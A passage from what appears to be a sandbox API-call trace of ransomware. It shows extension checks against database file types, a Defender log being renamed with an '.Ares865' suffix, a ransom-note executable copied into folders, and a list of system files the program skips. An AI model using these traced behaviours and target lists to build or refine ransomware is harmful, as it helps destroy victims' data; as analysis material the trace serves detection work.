(lpString="accdb") returned 5 [0090.157] lstrcmpiW (lpString1="3.log", lpString2="accdb") returned -1 [0090.158] lstrlenW (lpString="accdc") returned 5 [0090.158] lstrcmpiW (lpString1="3.log", lpString2="accdc") returned -1 [0090.158] lstrlenW (lpString="accde") returned 5 [0090.158] lstrcmpiW (lpString1="3.log", lpString2="accde") returned -1 [0090.158] lstrlenW (lpString="accdr") returned 5 [0090.158] lstrcmpiW (lpString1="3.log", lpString2="accdr") returned -1 [0090.158] lstrlenW (lpString="accdt") returned 5 [0090.158] lstrcmpiW (lpString1="3.log", lpString2="accdt") returned -1 [0090.158] lstrlenW (lpString="accdw") returned 5 [0090.158] lstrcmpiW (lpString1="3.log", lpString2="accdw") returned -1 [0090.158] lstrlenW (lpString="accft") returned 5 [0090.158] lstrcmpiW (lpString1="3.log", lpString2="accft") returned -1 [0090.158] lstrlenW (lpString="adb") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0090.158] lstrlenW (lpString="adb") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0090.158] lstrlenW (lpString="ade") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="ade") returned 1 [0090.158] lstrlenW (lpString="adf") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="adf") returned 1 [0090.158] lstrlenW (lpString="adn") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="adn") returned 1 [0090.158] lstrlenW (lpString="adp") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="adp") returned 1 [0090.158] lstrlenW (lpString="alf") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="alf") returned 1 [0090.158] lstrlenW (lpString="ask") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="ask") returned 1 [0090.158] lstrlenW (lpString="btr") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="btr") returned 1 [0090.158] lstrlenW (lpString="cat") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="cat") returned 1 [0090.158] lstrlenW (lpString="cdb") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="cdb") returned 1 [0090.158] lstrlenW (lpString="ckp") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="ckp") returned 1 [0090.158] lstrlenW (lpString="cma") returned 3 [0090.158] lstrcmpiW (lpString1="log", lpString2="cma") returned 1 [0090.159] lstrlenW (lpString="cpd") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="cpd") returned 1 [0090.159] lstrlenW (lpString="dacpac") returned 6 [0090.159] lstrcmpiW (lpString1="03.log", lpString2="dacpac") returned -1 [0090.159] lstrlenW (lpString="dad") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dad") returned 1 [0090.159] lstrlenW (lpString="dadiagrams") returned 10 [0090.159] lstrcmpiW (lpString1="235903.log", lpString2="dadiagrams") returned -1 [0090.159] lstrlenW (lpString="daschema") returned 8 [0090.159] lstrcmpiW (lpString1="5903.log", lpString2="daschema") returned -1 [0090.159] lstrlenW (lpString="db-journal") returned 10 [0090.159] lstrcmpiW (lpString1="235903.log", lpString2="db-journal") returned -1 [0090.159] lstrlenW (lpString="db-shm") returned 6 [0090.159] lstrcmpiW (lpString1="03.log", lpString2="db-shm") returned -1 [0090.159] lstrlenW (lpString="db-wal") returned 6 [0090.159] lstrcmpiW (lpString1="03.log", lpString2="db-wal") returned -1 [0090.159] lstrlenW (lpString="dbc") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dbc") returned 1 [0090.159] lstrlenW (lpString="dbs") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dbs") returned 1 [0090.159] lstrlenW (lpString="dbt") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dbt") returned 1 [0090.159] lstrlenW (lpString="dbv") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dbv") returned 1 [0090.159] lstrlenW (lpString="dbx") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dbx") returned 1 [0090.159] lstrlenW (lpString="dcb") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dcb") returned 1 [0090.159] lstrlenW (lpString="dct") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dct") returned 1 [0090.159] lstrlenW (lpString="dcx") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dcx") returned 1 [0090.159] lstrlenW (lpString="ddl") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="ddl") returned 1 [0090.159] lstrlenW (lpString="dlis") returned 4 [0090.159] lstrcmpiW (lpString1=".log", lpString2="dlis") returned -1 [0090.159] lstrlenW (lpString="dp1") returned 3 [0090.159] lstrcmpiW (lpString1="log", lpString2="dp1") returned 1 [0090.159] lstrlenW (lpString="dqy") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="dqy") returned 1 [0090.160] lstrlenW (lpString="dsk") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="dsk") returned 1 [0090.160] lstrlenW (lpString="dsn") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="dsn") returned 1 [0090.160] lstrlenW (lpString="dtsx") returned 4 [0090.160] lstrcmpiW (lpString1=".log", lpString2="dtsx") returned -1 [0090.160] lstrlenW (lpString="dxl") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="dxl") returned 1 [0090.160] lstrlenW (lpString="eco") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="eco") returned 1 [0090.160] lstrlenW (lpString="ecx") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="ecx") returned 1 [0090.160] lstrlenW (lpString="edb") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="edb") returned 1 [0090.160] lstrlenW (lpString="epim") returned 4 [0090.160] lstrcmpiW (lpString1=".log", lpString2="epim") returned -1 [0090.160] lstrlenW (lpString="fcd") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fcd") returned 1 [0090.160] lstrlenW (lpString="fdb") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fdb") returned 1 [0090.160] lstrlenW (lpString="fic") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fic") returned 1 [0090.160] lstrlenW (lpString="flexolibrary") returned 12 [0090.160] lstrcmpiW (lpString1="9-235903.log", lpString2="flexolibrary") returned -1 [0090.160] lstrlenW (lpString="fm5") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fm5") returned 1 [0090.160] lstrlenW (lpString="fmp") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fmp") returned 1 [0090.160] lstrlenW (lpString="fmp12") returned 5 [0090.160] lstrcmpiW (lpString1="3.log", lpString2="fmp12") returned -1 [0090.160] lstrlenW (lpString="fmpsl") returned 5 [0090.160] lstrcmpiW (lpString1="3.log", lpString2="fmpsl") returned -1 [0090.160] lstrlenW (lpString="fol") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fol") returned 1 [0090.160] lstrlenW (lpString="fp3") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fp3") returned 1 [0090.160] lstrlenW (lpString="fp4") returned 3 [0090.160] lstrcmpiW (lpString1="log", lpString2="fp4") returned 1 [0090.161] lstrlenW (lpString="fp5") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="fp5") returned 1 [0090.161] lstrlenW (lpString="fp7") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="fp7") returned 1 [0090.161] lstrlenW (lpString="fpt") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="fpt") returned 1 [0090.161] lstrlenW (lpString="frm") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="frm") returned 1 [0090.161] lstrlenW (lpString="gdb") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0090.161] lstrlenW (lpString="gdb") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0090.161] lstrlenW (lpString="grdb") returned 4 [0090.161] lstrcmpiW (lpString1=".log", lpString2="grdb") returned -1 [0090.161] lstrlenW (lpString="gwi") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="gwi") returned 1 [0090.161] lstrlenW (lpString="hdb") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="hdb") returned 1 [0090.161] lstrlenW (lpString="his") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="his") returned 1 [0090.161] lstrlenW (lpString="ib") returned 2 [0090.161] lstrcmpiW (lpString1="og", lpString2="ib") returned 1 [0090.161] lstrlenW (lpString="idb") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="idb") returned 1 [0090.161] lstrlenW (lpString="ihx") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="ihx") returned 1 [0090.161] lstrlenW (lpString="itdb") returned 4 [0090.161] lstrcmpiW (lpString1=".log", lpString2="itdb") returned -1 [0090.161] lstrlenW (lpString="itw") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="itw") returned 1 [0090.161] lstrlenW (lpString="jet") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="jet") returned 1 [0090.161] lstrlenW (lpString="jtx") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="jtx") returned 1 [0090.161] lstrlenW (lpString="kdb") returned 3 [0090.161] lstrcmpiW (lpString1="log", lpString2="kdb") returned 1 [0090.161] lstrlenW (lpString="kexi") returned 4 [0090.161] lstrcmpiW (lpString1=".log", lpString2="kexi") returned -1 [0090.162] lstrlenW (lpString="kexic") returned 5 [0090.162] lstrcmpiW (lpString1="3.log", lpString2="kexic") returned -1 [0090.162] lstrlenW (lpString="kexis") returned 5 [0090.162] lstrcmpiW (lpString1="3.log", lpString2="kexis") returned -1 [0090.162] lstrlenW (lpString="lgc") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="lgc") returned 1 [0090.162] lstrlenW (lpString="lwx") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="lwx") returned -1 [0090.162] lstrlenW (lpString="maf") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="maf") returned -1 [0090.162] lstrlenW (lpString="maq") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="maq") returned -1 [0090.162] lstrlenW (lpString="mar") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mar") returned -1 [0090.162] lstrlenW (lpString="marshal") returned 7 [0090.162] lstrcmpiW (lpString1="903.log", lpString2="marshal") returned -1 [0090.162] lstrlenW (lpString="mas") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mas") returned -1 [0090.162] lstrlenW (lpString="mav") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mav") returned -1 [0090.162] lstrlenW (lpString="maw") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="maw") returned -1 [0090.162] lstrlenW (lpString="mdbhtml") returned 7 [0090.162] lstrcmpiW (lpString1="903.log", lpString2="mdbhtml") returned -1 [0090.162] lstrlenW (lpString="mdn") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mdn") returned -1 [0090.162] lstrlenW (lpString="mdt") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mdt") returned -1 [0090.162] lstrlenW (lpString="mfd") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mfd") returned -1 [0090.162] lstrlenW (lpString="mpd") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mpd") returned -1 [0090.162] lstrlenW (lpString="mrg") returned 3 [0090.162] lstrcmpiW (lpString1="log", lpString2="mrg") returned -1 [0090.162] lstrlenW (lpString="mud") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="mud") returned -1 [0090.163] lstrlenW (lpString="mwb") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="mwb") returned -1 [0090.163] lstrlenW (lpString="myd") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="myd") returned -1 [0090.163] lstrlenW (lpString="ndf") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="ndf") returned -1 [0090.163] lstrlenW (lpString="nnt") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="nnt") returned -1 [0090.163] lstrlenW (lpString="nrmlib") returned 6 [0090.163] lstrcmpiW (lpString1="03.log", lpString2="nrmlib") returned -1 [0090.163] lstrlenW (lpString="ns2") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="ns2") returned -1 [0090.163] lstrlenW (lpString="ns3") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="ns3") returned -1 [0090.163] lstrlenW (lpString="ns4") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="ns4") returned -1 [0090.163] lstrlenW (lpString="nsf") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="nsf") returned -1 [0090.163] lstrlenW (lpString="nv") returned 2 [0090.163] lstrcmpiW (lpString1="og", lpString2="nv") returned 1 [0090.163] lstrlenW (lpString="nv2") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="nv2") returned -1 [0090.163] lstrlenW (lpString="nwdb") returned 4 [0090.163] lstrcmpiW (lpString1=".log", lpString2="nwdb") returned -1 [0090.163] lstrlenW (lpString="nyf") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="nyf") returned -1 [0090.163] lstrlenW (lpString="odb") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0090.163] lstrlenW (lpString="odb") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0090.163] lstrlenW (lpString="oqy") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="oqy") returned -1 [0090.163] lstrlenW (lpString="ora") returned 3 [0090.163] lstrcmpiW (lpString1="log", lpString2="ora") returned -1 [0090.164] lstrlenW (lpString="orx") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="orx") returned -1 [0090.164] lstrlenW (lpString="owc") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="owc") returned -1 [0090.164] lstrlenW (lpString="p96") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="p96") returned -1 [0090.164] lstrlenW (lpString="p97") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="p97") returned -1 [0090.164] lstrlenW (lpString="pan") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="pan") returned -1 [0090.164] lstrlenW (lpString="pdb") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="pdb") returned -1 [0090.164] lstrlenW (lpString="pdm") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="pdm") returned -1 [0090.164] lstrlenW (lpString="pnz") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="pnz") returned -1 [0090.164] lstrlenW (lpString="qry") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="qry") returned -1 [0090.164] lstrlenW (lpString="qvd") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="qvd") returned -1 [0090.164] lstrlenW (lpString="rbf") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="rbf") returned -1 [0090.164] lstrlenW (lpString="rctd") returned 4 [0090.164] lstrcmpiW (lpString1=".log", lpString2="rctd") returned -1 [0090.164] lstrlenW (lpString="rod") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="rod") returned -1 [0090.164] lstrlenW (lpString="rodx") returned 4 [0090.164] lstrcmpiW (lpString1=".log", lpString2="rodx") returned -1 [0090.164] lstrlenW (lpString="rpd") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="rpd") returned -1 [0090.164] lstrlenW (lpString="rsd") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="rsd") returned -1 [0090.164] lstrlenW (lpString="sas7bdat") returned 8 [0090.164] lstrcmpiW (lpString1="5903.log", lpString2="sas7bdat") returned -1 [0090.164] lstrlenW (lpString="sbf") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="sbf") returned -1 [0090.164] lstrlenW (lpString="scx") returned 3 [0090.164] lstrcmpiW (lpString1="log", lpString2="scx") returned -1 [0090.165] lstrlenW (lpString="sdb") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="sdb") returned -1 [0090.165] lstrlenW (lpString="sdc") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="sdc") returned -1 [0090.165] lstrlenW (lpString="sdf") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="sdf") returned -1 [0090.165] lstrlenW (lpString="sis") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="sis") returned -1 [0090.165] lstrlenW (lpString="spq") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="spq") returned -1 [0090.165] lstrlenW (lpString="te") returned 2 [0090.165] lstrcmpiW (lpString1="og", lpString2="te") returned -1 [0090.165] lstrlenW (lpString="teacher") returned 7 [0090.165] lstrcmpiW (lpString1="903.log", lpString2="teacher") returned -1 [0090.165] lstrlenW (lpString="tmd") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="tmd") returned -1 [0090.165] lstrlenW (lpString="tps") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="tps") returned -1 [0090.165] lstrlenW (lpString="trc") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0090.165] lstrlenW (lpString="trc") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0090.165] lstrlenW (lpString="trm") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="trm") returned -1 [0090.165] lstrlenW (lpString="udb") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="udb") returned -1 [0090.165] lstrlenW (lpString="udl") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="udl") returned -1 [0090.165] lstrlenW (lpString="usr") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="usr") returned -1 [0090.165] lstrlenW (lpString="v12") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="v12") returned -1 [0090.165] lstrlenW (lpString="vis") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="vis") returned -1 [0090.165] lstrlenW (lpString="vpd") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="vpd") returned -1 [0090.165] lstrlenW (lpString="vvv") returned 3 [0090.165] lstrcmpiW (lpString1="log", lpString2="vvv") returned -1 [0090.166] lstrlenW (lpString="wdb") returned 3 [0090.166] lstrcmpiW (lpString1="log", lpString2="wdb") returned -1 [0090.166] lstrlenW (lpString="wmdb") returned 4 [0090.166] lstrcmpiW (lpString1=".log", lpString2="wmdb") returned -1 [0090.166] lstrlenW (lpString="wrk") returned 3 [0090.166] lstrcmpiW (lpString1="log", lpString2="wrk") returned -1 [0090.166] lstrlenW (lpString="xdb") returned 3 [0090.166] lstrcmpiW (lpString1="log", lpString2="xdb") returned -1 [0090.166] lstrlenW (lpString="xld") returned 3 [0090.166] lstrcmpiW (lpString1="log", lpString2="xld") returned -1 [0090.166] lstrlenW (lpString="xmlff") returned 5 [0090.166] lstrcmpiW (lpString1="3.log", lpString2="xmlff") returned -1 [0090.166] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 104 [0090.166] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.166] GetLastError () returned 0x20 [0090.166] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 126 [0090.166] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 126 [0090.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.167] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4789 [0090.167] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x7e, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x7e, lpOverlapped=0x0) returned 1 [0090.167] CloseHandle (hObject=0x118) returned 1 [0090.167] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.167] CloseHandle (hObject=0x0) returned 0 [0090.167] CloseHandle (hObject=0x0) returned 0 [0090.167] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.167] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.167] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0090.167] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans" [0090.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0090.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.168] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans") returned 68 [0090.168] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans" [0090.168] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.168] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\scans\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.168] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.168] GetLastError () returned 0x0 [0090.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.168] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.169] CloseHandle (hObject=0x120) returned 1 [0090.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.169] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.169] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c420720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.169] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.169] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.169] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.169] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c420720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.169] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.169] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.169] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.169] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.169] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0090.169] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.169] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0090.169] lstrcmpiW (lpString1="History", lpString2=".") returned 1 [0090.169] lstrcmpiW (lpString1="History", lpString2="..") returned 1 [0090.169] lstrcmpiW (lpString1="History", lpString2="windows") returned -1 [0090.169] lstrcmpiW (lpString1="History", lpString2="bootmgr") returned 1 [0090.169] lstrcmpiW (lpString1="History", lpString2="temp") returned -1 [0090.169] lstrcmpiW (lpString1="History", lpString2="pagefile.sys") returned -1 [0090.169] lstrcmpiW (lpString1="History", lpString2="boot") returned 1 [0090.169] lstrcmpiW (lpString1="History", lpString2="ids.txt") returned -1 [0090.169] lstrcmpiW (lpString1="History", lpString2="ntuser.dat") returned -1 [0090.169] lstrcmpiW (lpString1="History", lpString2="perflogs") returned -1 [0090.169] lstrcmpiW (lpString1="History", lpString2="MSBuild") returned -1 [0090.169] lstrlenW (lpString="History") returned 7 [0090.169] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\*") returned 70 [0090.169] lstrcpyW (in: lpString1=0x2cce48a, lpString2="History" | out: lpString1="History") returned="History" [0090.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0090.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a) returned 0x2d77a8 [0090.170] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0090.170] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c420720, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c420720, 